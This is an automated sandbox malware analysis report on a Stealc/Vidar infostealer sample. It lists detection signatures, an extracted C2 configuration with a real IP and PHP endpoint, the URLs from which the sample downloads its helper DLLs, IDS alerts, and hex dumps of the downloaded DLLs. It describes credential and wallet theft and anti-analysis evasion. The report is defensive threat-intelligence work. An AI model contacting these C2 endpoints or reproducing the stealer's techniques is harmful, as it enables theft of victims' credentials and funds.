Windows Analysis Report
random(1).exe

Overview

General Information

Sample name: random(1).exe
Analysis ID: 1629904
MD5: 1e95dc10fef7079a5d3fa793732a7cce
SHA1: 8e9ccb511e76c921c6ddf2a2615a2e3c86ea4113
SHA256: 81ac77037e15e56a6cdc0ba7e2af38e3e5a9f7a353054276c763e57d03db5ec1
Tags: 185-215-113-209exeuser-JAMESWT_MHT
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: random(1).exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlln Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJ Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllc Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllBN Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/nss3.dllw Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllbN Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlls Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpp Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpl Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprowser Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll; Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpC Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phper Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpve Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpO Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpW Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dlle Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dllA Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllO Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll. Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpR0 Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php%0 Avira URL Cloud: Label: malware
Source: http://185.215.113.115/Y Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllzN Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/sqlite3.dll= Avira URL Cloud: Label: malware
Found malware configuration
Source: random(1).exe.7600.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
Multi AV Scanner detection for submitted file
Source: random(1).exe ReversingLabs: Detection: 78%
Source: random(1).exe Virustotal: Detection: 77% Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C5EA9A0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E4440 PK11_PrivDecrypt, 0_2_6C5E4440
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C5B4420
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E44C0 PK11_PubEncrypt, 0_2_6C5E44C0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C6325B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C5EA650
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C5C8670
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C5CE6E0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6C60A730
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6C610180
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError, 0_2_6C5E43B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 0_2_6C607C00
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 0_2_6C5C7D60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 0_2_6C60BD30
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 0_2_6C609EC0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1, 0_2_6C5E3FF0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 0_2_6C5E3850
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 0_2_6C5E9840
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C60DA40 SEC_PKCS7ContentIsEncrypted, 0_2_6C60DA40
Uses 32bit PE files
Source: random(1).exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49733
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49733
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49733 -> 185.215.113.115:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.115/c4becf79229cb002.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
